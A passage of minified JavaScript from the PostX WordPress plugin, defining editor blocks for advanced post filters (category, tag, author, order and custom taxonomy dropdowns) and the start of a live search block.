ultp-filter-button ${r?"ultp-filter-button-active":""}`,role:"button"});return(0,a.createElement)("div",(0,o.Z)({},p,{onClick:()=>s((e=>!e))}),"loading"===l&&"Loading...","none"===l&&"None","error"===l&&"Error","success"===l&&e)}},9887:(e,t,l)=>{"use strict";l.d(t,{Z:()=>y});var o=l(67294),a=l(53049),i=l(99838),n=l(87025),r=l(25968),s=l(15975),p=l(22692);const{__}=wp.i18n,{useEffect:c,useMemo:u,useState:d}=wp.element,{useSelect:m,useDispatch:g}=wp.data;function y({attributes:e,setAttributes:t,clientId:l,context:g,isSelected:y}){const{blockId:b,type:v,allText:h,filterStyle:f,filterValues:k,selectedValue:w,selectedLabel:x,dropdownOptionsType:T,dropdownOptions:_}=e;c((()=>{t({blockId:l.slice(-6)})}),[l]);const C=g["post-grid-parent/postBlockClientId"],E=m((e=>{if(C){const t=e("core/block-editor").getBlocks(C).filter((e=>(0,n.M5)(e.name)));return JSON.stringify(t.filter((e=>e.attributes.queryType)).map((e=>e.attributes.queryType)))}return[]}),[C]),[S,P]=d(new Map),[L,I]=d("loading");c((()=>{"custom_tax"===v&&E&&(I("loading"),wp.apiFetch({path:"ultp/v2/custom_tax",method:"POST",data:{postTypes:JSON.parse(E)}}).then((e=>{if(0===e.length)return void I("none");const l=new Map;e.forEach((e=>{l.set(e.id,{label:e.name})})),t({postTypes:E}),P(l),I("success")})).catch((e=>{console.log(e),I("error")})))}),[E]);const[B,U]=(0,n.FW)(v,h,e);c((()=>{t({selectedValue:"_all",selectedLabel:""})}),[]);const M=u((()=>"inline"===f||"dropdown"===f&&"specific"===T?Array.from(("custom_tax"===v?"success"===L?S:new Map:"success"===B?U:new Map).entries()).map((([e,t])=>({value:e,label:t.label}))):[]),[L,f,T,B,S,U]),A=u((()=>{if("dropdown"===f&&"specific"===T){const e=JSON.parse(_),t=new Map,l="custom_tax"===v?"success"===L?S:new Map:"success"===B?U:new Map;return e.forEach((e=>{if(l.has(e)){const o=l.get(e);t.set(e,{...o})}})),t}return"custom_tax"===v?S:U}),[T,_,U,S,v,L,B,f]),H=u((()=>JSON.parse(k)),[k]);let N;return b&&(N=(0,i.Kh)(e,"ultimate-post/filter-select",b,(0,a.k0)())),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(p.Z,{name:"ultimate-post/filter-select",attributes:e,setAttributes:t,clientId:l,inlineOptions:M}),N&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:N}}),"dropdown"===f&&(0,o.createElement)(s.Z,{name:v,options:A,status:"custom_tax"===v?L:B,blockId:b,clientId:l,value:w,openDropdown:y,onChange:(e,l)=>{t({selectedValue:String(e),selectedLabel:l})},isSearchEnabled:e.searchEnabled,searchPlaceholder:e.sPlaceholderText}),"inline"===f&&(0,o.createElement)("div",{className:`ultp-block-${b}-wrapper`},H.map((e=>{const l=M.filter((t=>t.value===e)).map((e=>e.label));return 0===l.length&&M[0]&&M[0].value&&t({filterValues:JSON.stringify([M[0].value])}),(0,o.createElement)(r.Z,{key:e,text:l[0]||"Select a Value",status:"custom_tax"===v?L:B,blockId:b})}))))}},15975:(e,t,l)=>{"use strict";l.d(t,{Z:()=>p});var o=l(87462),a=l(67294),i=l(87025),n=l(64766);const{useBlockProps:r}=wp.blockEditor,{useEffect:s}=wp.element;function p({name:e,value:t,options:l,status:p,blockId:c,clientId:u,onChange:d,openDropdown:m,isSearchEnabled:g=!1,searchPlaceholder:y=""}){const b=!l.has(t)&&l.size>0&&"success"===p&&t;s((()=>{if(b){const e=l.keys().next().value;d(e,"")}}),[b,d,l]);const v=r({className:`ultp-block-${c} ultp-filter-select`});return(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",(0,o.Z)({},v,{"aria-expanded":m}),(0,a.createElement)("div",{className:"ultp-filter-select-field ultp-filter-select__parent"},(0,a.createElement)("span",{className:"ultp-filter-select-field-selected ultp-filter-select__parent-inner","aria-label":e},"loading"===p&&"Loading...","none"===p&&"None","error"===p&&"Error","success"===p&&(l.has(t)?l.get(t).label:"...")),(0,a.createElement)("span",{className:"ultp-filter-select-field-icon "+(m?"ultp-dropdown-icon-rotate":"")},n.ZP.collapse_bottom_line)),m&&(0,a.createElement)("ul",{className:"ultp-filter-select-options ultp-filter-select__dropdown"},g&&(0,a.createElement)("input",{className:"ultp-filter-select-search",type:"search",placeholder:y}),"success"===p&&Array.from(l.entries()).map((([t,l])=>(0,a.createElement)("li",{className:"ultp-filter-select__dropdown-inner "+(l.disabled?"disabled":""),key:t,onClick:o=>{if(l.disabled)return;const a=`${(0,i.DX)(e)}: ${l.label}`;d(t,"_all"===t?"":a)}},l.label))))))}},22692:(e,t,l)=>{"use strict";l.d(t,{Z:()=>v});var o=l(67294),a=l(53049),i=l(87763),n=l(92637),r=l(31760);const{__}=wp.i18n,{InspectorControls:s}=wp.blockEditor,p=[{icon:(0,o.createElement)("span",{className:"dashicons dashicons-editor-alignleft"}),value:"margin-right: auto !important;margin-left:0px !important",label:__("Left","ultimate-post")},{icon:(0,o.createElement)("span",{className:"dashicons dashicons-editor-justify"}),value:"margin-left:0px !important;margin-right:0px !important",label:__("Normal","ultimate-post")},{icon:(0,o.createElement)("span",{className:"dashicons dashicons-editor-alignright"}),value:"margin-left: auto !important;margin-right:0px !important",label:__("Right","ultimate-post")}],c=(e,t)=>{const{filterStyle:l,type:o,dropdownOptionsType:a}=e,i="dropdown"===l&&["category","tags","author","custom_tax"].includes(o),n=i&&"specific"===a,r=["category","tags","author","custom_tax"].includes(o);return[{data:{type:"alignment",key:"align",responsive:!0,label:__("Alignment","ultimate-post"),options:p.map((e=>e.value)),icons:["left","flow","right"]}},{data:{type:"tag",key:"filterStyle",label:__("Filter Style","ultimate-post"),options:[{value:"dropdown",label:"Dropdown"},{value:"inline",label:"Inline"}]}},{data:{disableIf:e=>"inline"!==e.filterStyle,type:"select",key:"filterValues",multiple:!0,label:__("Filter Values","ultimate-post"),options:t}},{data:i?{type:"tag",key:"dropdownOptionsType",label:__("Available Options","ultimate-post"),options:[{value:"all",label:__("All","ultimate-post")},{value:"specific",label:__("Specific","ultimate-post")}]}:{}},{data:n?{type:"select",key:"dropdownOptions",multiple:!0,label:__("Select Specific Options","ultimate-post"),options:t,help:__("First selected option will be the default value.","ultimate-post")}:{}},{data:{type:"text",key:"allText",label:__("All Content Text","ultimate-post")}},{data:r?{type:"toggle",key:"searchEnabled",label:__("Enable Searching in Dropdown","ultimate-post")}:{}}]},u=e=>{const{filterStyle:t}=e;return[{data:{type:"typography",key:"pTypo",label:__("Typography","ultimate-post")}},{depend:"dropdown"===t,data:{type:"range",key:"pIconSize",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Icon Size","ultimate-post")}},{data:{type:"color",key:"pColor",label:__("Color","ultimate-post")}},{data:{type:"color",key:"pColorHover",label:__("Hover Color","ultimate-post")}},{data:{type:"color",key:"pBgColor",label:__("Background Color","ultimate-post")}},{data:{type:"color",key:"pBgColorHover",label:__("Background Hover Color","ultimate-post")}},{data:{type:"border",key:"pBorder",label:__("Border","ultimate-post")}},{data:{type:"dimension",key:"pBorderRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"boxshadow",key:"pBoxShadow",label:__("BoxShadow","ultimate-post")}},{data:{disableIf:e=>"inline"!==e.filterStyle,type:"range",key:"iGap",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Gap Between Inline Items","ultimate-post")}},{data:{type:"dimension",key:"pPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}}]},d=()=>[{data:{type:"alignment",key:"dAlign",responsive:!0,label:__("Alignment","ultimate-post"),disableJustify:!0}},{data:{type:"tag",key:"dWidthType",label:__("Width","ultimate-post"),options:[{value:"auto",label:__("Auto","ultimate-post")},{value:"fixed",label:__("Fixed","ultimate-post")}]}},{data:{disableIf:e=>"fixed"!==e.dWidthType,type:"range",key:"dWidth",min:0,max:500,step:1,responsive:!0,unit:["px","em","rem"],label:__("Fixed Width","ultimate-post")}},{data:{type:"typography",key:"dTypo",label:__("Typography","ultimate-post")}},{data:{type:"color",key:"dColor",label:__("Color","ultimate-post")}},{data:{type:"color",key:"dColorHover",label:__("Hover Color","ultimate-post")}},{data:{type:"color",key:"dBgColor",label:__("Background Color","ultimate-post")}},{data:{type:"color",key:"dBgColorHover",label:__("Background Hover Color","ultimate-post")}},{data:{type:"border",key:"dBorder",label:__("Border","ultimate-post")}},{data:{type:"dimension",key:"dBorderRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"boxshadow",key:"dBoxShadow",label:__("BoxShadow","ultimate-post")}},{data:{type:"range",key:"dSpace",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Space between Menu","ultimate-post")}},{data:{type:"dimension",key:"dPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}}],m=e=>[{data:{type:"typography",key:"sTypo",label:__("Typography","ultimate-post")}},{data:{type:"text",key:"sPlaceholderText",label:__("Placeholder Text","ultimate-post")}},{data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"sColor",label:__("Color","ultimate-post")},{type:"color",key:"sBgColor",label:__("Background Color","ultimate-post")},{type:"color",key:"sPlaceholderColor",label:__("Placeholder Color","ultimate-post")},{type:"border",key:"sBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"sBorderRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"boxshadow",key:"sBoxShadow",label:__("Box Shadow","ultimate-post")}]},{name:"hover",title:__("Hover/Active","ultimate-post"),options:[{type:"color",key:"sColorHover",label:__("Color","ultimate-post")},{type:"color",key:"sBgColorHover",label:__("Background Color","ultimate-post")},{type:"color",key:"sPlaceholderColorHover",label:__("Placeholder Color","ultimate-post")},{type:"border",key:"sBorderHover",label:__("Border","ultimate-post")},{type:"dimension",key:"sBorderRadiusHover",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"boxshadow",key:"sBoxShadowHover",label:__("Box Shadow","ultimate-post")}]}]}},{data:{type:"dimension",key:"sPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"dimension",key:"sMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0}}],g=e=>e.map((e=>e.data)),y=(e,t)=>[{isToolbar:!0,data:{type:"tab_toolbar",content:[{name:"general",title:__("Select Filter Settings","ultimate-post"),options:g(c(e,t))}]}}],b=(e,t)=>{const{filterStyle:l,type:o}=e,a=[{name:"field_style",title:__("dropdown"===l?"Field Style":"Style","ultimate-post"),options:g(u(e))}];return"dropdown"===l&&a.push({name:"dropdown_style",title:__("Dropdown Style","ultimate-post"),options:g(d())}),[{isToolbar:!0,data:{type:"tab_toolbar",content:a}}]};function v({attributes:e,setAttributes:t,name:l,clientId:p,inlineOptions:g}){const v={setAttributes:t,name:l,attributes:e,clientId:p},{filterStyle:h,type:f}=e;return(0,o.createElement)(o.Fragment,null,(0,o.createElement)(r.Z,{store:v,include:[{type:"custom",icon:i.Z.setting,label:__("Select Filter Settings","ultimate-post")}]},(0,o.createElement)(a.B3,{store:v,include:y(e,g)})),(0,o.createElement)(r.Z,{store:v,include:[{type:"custom",icon:i.Z.styleIcon,label:__("Select Filter Style","ultimate-post")}]},(0,o.createElement)(a.B3,{store:v,include:b(e,g)})),(0,o.createElement)(s,null,(0,o.createElement)(n.Sections,{classes:"ultp-select-filter-settings"},(0,o.createElement)(n.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",store:v,include:c(e,g)})),(0,o.createElement)(n.Section,{slug:"style",title:__("Styles","ultimate-post")},(0,o.createElement)(a.T,{title:"dropdown"===h?__("Field Style","ultimate-post"):"inline",store:v,include:u(e),initialOpen:!0}),"dropdown"===h&&(0,o.createElement)(a.T,{title:__("Dropdown Style","ultimate-post"),store:v,include:d()}),["category","tags","author","custom_tax"].includes(f)&&(0,o.createElement)(a.T,{title:__("Search Input Style","ultimate-post"),store:v,include:m(e)}))),(0,a.dH)()))}},78501:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},type:{type:"string",default:""},dropdownOptionsType:{type:"string",default:"all"},dropdownOptions:{type:"string",default:'["_all"]'},filterStyle:{type:"string",default:"dropdown"},filterValues:{type:"string",default:'["_all"]'},allText:{type:"string",default:"All"},selectedValue:{type:"string",default:"_all"},selectedLabel:{type:"string",default:""},postTypes:{type:"string",default:"[]"},searchEnabled:{type:"boolean",default:!1},queryOrder:{type:"string",default:"desc"},align:{type:"object",default:{lg:"margin-left:0px !important;margin-right:0px !important"},style:[{selector:"{{ULTP}}.ultp-filter-select { {{align}} ; } {{ULTP}}-wrapper { {{align}}; display:flex; flex-wrap:wrap; }"}]},iGap:{type:"object",default:{lg:"10",unit:"px"},style:[{selector:"{{ULTP}}-wrapper  { gap: {{iGap}}; }"}]},pTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",transform:"",family:"",weight:"400"},style:[{selector:"{{ULTP}} .ultp-filter-select__parent-inner, {{ULTP}}.ultp-filter-button"}]},pIconSize:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"filterStyle",condition:"==",value:"dropdown"}],selector:"{{ULTP}} .ultp-filter-select-field-icon svg { width: {{pIconSize}}; height:{{pIconSize}} }"}]},pColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-filter-select__parent-inner,{{ULTP}}.ultp-filter-button { color:{{pColor}}; } {{ULTP}} .ultp-filter-select-field-icon { color:{{pColor}}; } "}]},pColorHover:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-filter-select__parent:hover .ultp-filter-select__parent-inner { color:{{pColorHover}}; } {{ULTP}} .ultp-filter-select__parent:hover .ultp-filter-select-field-icon svg { color:{{pColorHover}}; } {{ULTP}}.ultp-filter-button:hover{ color:{{pColorHover}}; } {{ULTP}}.ultp-filter-button-active{ color:{{pColorHover}}; }"}]},pBgColor:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{selector:"{{ULTP}} .ultp-filter-select__parent, {{ULTP}}.ultp-filter-button { background-color:{{pBgColor}}; } "}]},pBgColorHover:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-filter-select__parent:hover,{{ULTP}}.ultp-filter-button:hover { background-color:{{pBgColorHover}}; } {{ULTP}}.ultp-filter-button-active { background-color:{{pBgColorHover}}; }"}]},pBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Contrast_1_color)",type:"solid"},style:[{selector:"{{ULTP}} .ultp-filter-select__parent, {{ULTP}}.ultp-filter-button"}]},pBorderRadius:{type:"object",default:{lg:"2",unit:"px"},style:[{selector:"{{ULTP}} .ultp-filter-select__parent,{{ULTP}}.ultp-filter-button { border-radius:{{pBorderRadius}}; }"}]},pBoxShadow:{type:"object",default:{openShadow:1,width:{top:0,right:0,bottom:0,left:0},color:"var(--postx_preset_Secondary_color)"},style:[{selector:"{{ULTP}} .ultp-filter-select__parent, {{ULTP}}.ultp-filter-button"}]},pPadding:{type:"object",default:{lg:{top:"8",bottom:"8",left:"14",right:"14",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-filter-select__parent, {{ULTP}}.ultp-filter-button { padding:{{pPadding}}; }"}]},dAlign:{type:"string",default:"left",style:[{selector:"{{ULTP}} .ultp-filter-select__dropdown-inner{ text-align:{{dAlign}}; }"}]},dWidthType:{type:"string",default:"auto"},dWidth:{type:"object",default:{lg:"200",unit:"px"},style:[{depends:[{key:"dWidthType",condition:"==",value:"fixed"}],selector:"{{ULTP}} .ultp-filter-select__dropdown { width: {{dWidth}}; }"}]},dTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",transform:"",family:"",weight:"400"},style:[{selector:"{{ULTP}} .ultp-filter-select__dropdown-inner"}]},dColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-filter-select__dropdown-inner { color:{{dColor}}; }  {{ULTP}} .ultp-filter-select-options::-webkit-scrollbar-thumb{ background: {{dColor}}; }"}]},dColorHover:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-filter-select__dropdown-inner:hover { color:{{dColorHover}}; }"}]},dBgColor:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{selector:"{{ULTP}} .ultp-filter-select__dropdown { background-color:{{dBgColor}}; } "}]},dBgColorHover:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-filter-select__dropdown-inner:hover { background-color:{{dBgColorHover}}; } "}]},dBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Contrast_1_color)",type:"solid"},style:[{selector:"{{ULTP}} .ultp-filter-select__dropdown"}]},dBorderRadius:{type:"object",default:{lg:"2",unit:"px"},style:[{selector:"{{ULTP}} .ultp-filter-select__dropdown { border-radius:{{dBorderRadius}}; }"}]},dBoxShadow:{type:"object",default:{openShadow:0,width:{top:0,right:0,bottom:0,left:0},color:"var(--postx_preset_Secondary_color)"},style:[{selector:"{{ULTP}} .ultp-filter-select__dropdown"}]},dSpace:{type:"object",default:{lg:"0",unit:"px"},style:[{selector:"{{ULTP}} .ultp-filter-select__dropdown-inner { margin-bottom: {{dSpace}}; }"}]},dPadding:{type:"object",default:{lg:{top:"5",bottom:"5",left:"5",right:"5",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-filter-select__dropdown { padding:{{dPadding}}; }"}]},sTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",transform:"",family:"",weight:"400"},style:[{selector:"{{ULTP}} .ultp-filter-select-search"}]},sPlaceholderText:{type:"string",default:"Search..."},sColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-filter-select-search { color: {{sColor}}; } }"}]},sColorHover:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"\n                    {{ULTP}} .ultp-filter-select-search:hover,\n                    {{ULTP}} .ultp-filter-select-search:focus { \n                        color:{{sColorHover}}; \n                    }"}]},sPlaceholderColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{selector:"{{ULTP}} .ultp-filter-select-search::placeholder { color: {{sPlaceholderColor}}; } }"}]},sPlaceholderColorHover:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{selector:"\n                    {{ULTP}} .ultp-filter-select-search::placeholder:hover {\n                        color:{{sPlaceholderColorHover}}; \n                    }"},{selector:"\n                    {{ULTP}} .ultp-filter-select-search::placeholder:focus { \n                        color:{{sPlaceholderColorHover}}; \n                    }"}]},sBgColor:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{selector:"{{ULTP}} .ultp-filter-select-search { background-color:{{sBgColor}}; } "}]},sBgColorHover:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{selector:"\n                    {{ULTP}} .ultp-filter-select-search:hover,\n                    {{ULTP}} .ultp-filter-select-search:focus { \n                        background-color: {{sBgColorHover}}; \n                    }"}]},sBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Contrast_1_color)",type:"solid"},style:[{selector:"{{ULTP}} .ultp-filter-select-search"}]},sBorderHover:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Primary_color)",type:"solid"},style:[{selector:"{{ULTP}} .ultp-filter-select-search:hover, {{ULTP}} .ultp-filter-select-search:focus"}]},sBorderRadius:{type:"object",default:{lg:{top:"2",bottom:"2",left:"2",right:"2",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-filter-select-search { border-radius: {{sBorderRadius}}; }"}]},sBorderRadiusHover:{type:"object",default:{lg:{top:"2",bottom:"2",left:"2",right:"2",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-filter-select-search:focus { border-radius: {{sBorderRadiusHover}}; }"},{selector:"{{ULTP}} .ultp-filter-select-search:hover { border-radius: {{sBorderRadiusHover}}; }"}]},sBoxShadow:{type:"object",default:{openShadow:0,width:{top:0,right:0,bottom:0,left:0},color:"var(--postx_preset_Primary_color)"},style:[{selector:"{{ULTP}} .ultp-filter-select-search"}]},sBoxShadowHover:{type:"object",default:{openShadow:1,width:{top:0,right:0,bottom:0,left:1},color:"var(--postx_preset_Primary_color)"},style:[{selector:"{{ULTP}} .ultp-filter-select-search:focus"}]},sPadding:{type:"object",default:{lg:{top:"0",bottom:"0",left:"8",right:"8",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-filter-select-search { padding:{{sPadding}}; }"}]},sMargin:{type:"object",default:{lg:{top:"0",bottom:"5",left:"0",right:"0",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-filter-select-search { margin:{{sMargin}}; }"}]}}},42177:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(9887),n=l(78501),r=l(50941),s=l(93180);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks,c=(0,a.Z)("https://wpxpo.com/docs/postx/postx-features/advanced-post-filter/","block_docs");p(r,{icon:s.L_,description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Post Block from PostX","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:c,rel:"noreferrer"},__("Documentation","ultimate-post"))),attributes:n.Z,variations:s.iQ,isDefault:!1,usesContext:["post-grid-parent/postBlockClientId"],ancestor:["ultimate-post/advanced-filter"],supports:{},edit:i.Z})},93180:(e,t,l)=>{"use strict";l.d(t,{L_:()=>n,iQ:()=>u});var o=l(67294);const{__}=wp.i18n,a=(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/adv-filter/author-filter.svg"}),i=(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/adv-filter/tags-filter.svg"}),n=(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/adv-filter/category-filter.svg"}),r=(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/adv-filter/order-by-filter.svg"}),s=(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/adv-filter/order-filter.svg"}),p=(0,o.createElement)("div",{className:"ultp-block-inserter-icon-section"},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/adv-filter/advanced-sort-filter.svg"}),!ultp_data.active&&(0,o.createElement)("span",{className:"ultp-pro-block"},"Pro")),c=(0,o.createElement)("div",{className:"ultp-block-inserter-icon-section"},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/adv-filter/taxonomy-sort-filter.svg"}),!ultp_data.active&&(0,o.createElement)("span",{className:"ultp-pro-block"},"Pro")),u=[{name:"tags",icon:i,title:__("Tags Filter","ultimate-post"),description:__("Filter posts by Tags","ultimate-post"),attributes:{type:"tags",allText:"All Tags"},isActive:["type"]},{name:"category",icon:n,title:__("Category Filter","ultimate-post"),description:__("Filter posts by Category","ultimate-post"),isDefault:!0,attributes:{type:"category",allText:"All Categories"},isActive:["type"]},{name:"author",title:__("Author Filter","ultimate-post"),icon:a,description:__("Filter posts by Author","ultimate-post"),attributes:{type:"author",allText:"All Authors"},isActive:["type"]},{name:"order",icon:s,title:__("Order Filter (Asc/Desc)","ultimate-post"),description:__("Orders posts","ultimate-post"),attributes:{type:"order"},isActive:["type"]},{name:"order_by",icon:r,title:__("Order By Filter","ultimate-post"),description:__("Orders posts by a Attribute","ultimate-post"),attributes:{type:"order_by"},isActive:["type"]},{name:"adv_sort",icon:p,title:__("Advanced Sort Filter","ultimate-post"),description:__("Orders posts (Advanced)","ultimate-post"),attributes:{type:"adv_sort",allText:"Advanced Sort"},isActive:["type"]},{name:"custom_tax",icon:c,title:__("Custom Taxonomy","ultimate-post"),description:__("Filter posts by Custom Taxonomy","ultimate-post"),attributes:{type:"custom_tax"},isActive:["type"]}];u.map((e=>"filter-select/"+e.name))},9544:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(4902),n=l(79060),r=l(70766),s=l(7110);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks,c=(0,a.Z)("https://wpxpo.com/docs/postx/postx-features/advanced-post-filter/","block_docs");p(s,{icon:(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/adv-filter/filter-icon.svg"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Allow users to find specific posts using filters","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:c,rel:"noreferrer"},__("Documentation","ultimate-post"))),attributes:r.Z,providesContext:{"advanced-filter/cId":"clientId"},usesContext:["postId"],edit:i.Z,save:n.Z})},52021:(e,t,l)=>{"use strict";l.d(t,{Z:()=>f});var o=l(67294),a=l(53049),i=l(99838),n=l(31760),r=l(83100),s=l(64766),p=l(16130);const{__}=wp.i18n,{InspectorControls:c,RichText:u,useBlockProps:d}=wp.blockEditor,{useEffect:m,useState:g,useRef:y,Fragment:b}=wp.element,{getBlockAttributes:v,getBlockRootClientId:h}=wp.data.select("core/block-editor");function f(e){const t=y(null),[l,f]=g("Content"),[k,w]=g({postsList:"",emptyList:!1,viewAll:!1,loading:!1,error:!1,searchVal:"",searchNavPopup:!1,loadmore:1,totalPost:null}),{setAttributes:x,className:T,name:_,clientId:C,attributes:E,attributes:{blockId:S,currentPostId:P,searchAjaxEnable:L,moreResultsbtn:I,resImageEnable:B,resAuthEnable:U,resDateEnable:M,resCatEnable:A,resExcerptEnable:H,resExcerptLimit:N,moreResultPosts:j,searchPostType:Z,searchButtonText:O,searchInputPlaceholder:R,previewImg:D,advanceId:z,searchFormStyle:F,searchPopupIconStyle:W,searchnoresult:V,searchPopup:G,searchBtnText:q,searchBtnIcon:$,popupAnimation:K,moreResultsText:J,windowpopupHeading:Y,windowpopupText:X,blockPubDate:Q}}=e;function ee(e,t=!1,l=1){let o=j;I||(o=10,l=1,w({...k,postsList:""})),w({...k,postsList:t?"":k.postsList,loading:!0,emptyList:!1}),e&&e.length>2&&L?wp.apiFetch({path:"/ultp/ultp_search_data",method:"POST",data:{searchText:e,postPerPage:o,paged:l,image:B,author:U,category:A,date:M,excerpt:H,excerptLimit:N,exclude:Z.length>0&&JSON.parse(Z)}}).then((e=>{e.post_data.length>0?(w({...k,postsList:e.post_data,loading:!1,error:!1,emptyList:!1,totalPost:e.post_count}),w(t?{...k,postsList:e.post_data,loadmore:1}:{...k,postsList:k.postsList+e.post_data})):e.post_data.length<1&&w({...k,loading:!1,error:!1,loadmore:1,emptyList:!0})})).catch((e=>{console.log("error",e.message),w({...k,loading:!0,error:!0})})):w({...k,loading:!1,error:!1,viewAll:!1,loadmore:1})}function te(e,t=!0,l=!0){const a=t&&"popup-icon1"!=e;return(0,o.createElement)("div",{className:e?"ultp-searchpopup-icon ultp-searchbtn-"+e:"ultp-search-button"},l&&s.ZP.search_line,a&&(0,o.createElement)(u,{key:"editable",tagName:"span",className:"ultp-search-button__text",placeholder:__("Change Text…","ultimate-post"),onChange:e=>x({searchButtonText:e}),value:O}))}function le(e,t,l,a){const i=e?.length>0||k.loading&&k.totalPost!=k.postsList.length||k.emptyList&&0!=k.searchVal||t&&k.postsList.length>0&&0!=k.searchVal.length&&!(k.totalPost<k.loadmore*j);return(0,o.createElement)("div",{className:"ultp-search-result "+(i?"ultp-result-show":"")},(0,o.createElement)("div",{className:"ultp-result-data  "+(e?.length>0?"ultp-result-show":""),dangerouslySetInnerHTML:{__html:e}}),k.loading&&k.totalPost!=k.postsList.length&&(0,o.createElement)("div",{className:"ultp-search-result__item ultp-result-loader active"}),k.emptyList&&0!=k.searchVal&&(0,o.createElement)("div",{className:"ultp-search-result__item ultp-search-noresult active"},(0,o.createElement)(u,{key:"editable",tagName:"span",className:"ultp-search-button__text",placeholder:__("Change Text…","ultimate-post"),onChange:e=>x({searchnoresult:e}),value:a})),t&&k.postsList.length>0&&0!=k.searchVal.length&&!(k.totalPost<k.loadmore*j)&&k.totalPost-k.loadmore*j!=0&&(0,o.createElement)("div",{className:"ultp-backend-viewmore ultp-search-result__item ultp-viewall-results active",onClick:()=>w({...k,viewAll:!k.viewAll,loadmore:Number(k.loadmore)+1,loading:!0})},(0,o.createElement)(u,{key:"editable",tagName:"span",className:"",placeholder:__("Change Text…","ultimate-post"),onChange:e=>x({moreResultsText:e}),value:l}),"(",k.totalPost-k.loadmore*j,")"))}function oe(e,t,l){return(0,o.createElement)("div",{className:`ultp-searchform-content ultp-searchform-${e}`},(0,o.createElement)("div",{className:"ultp-search-inputwrap"},(0,o.createElement)("input",{type:"text",className:"ultp-searchres-input",value:k.searchVal,placeholder:R,onChange:e=>w({...k,searchVal:e.target.value})}),k.searchVal.length>2&&(0,o.createElement)("span",{className:"ultp-search-clear active","data-blockid":S,onClick:()=>w({...k,searchVal:"",postsList:"",loadmore:1})},s.ZP.close_line)),te(!1,t,l))}m((()=>{const e=C.substr(0,6),t=v(h(C));(0,a.qi)(x,t,P,C),S?S&&S!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||x({blockId:e})):x({blockId:e}),"empty"==Q&&x({blockPubDate:(new Date).toISOString()})}),[C]),m((()=>{const e=t.current;if(e){const 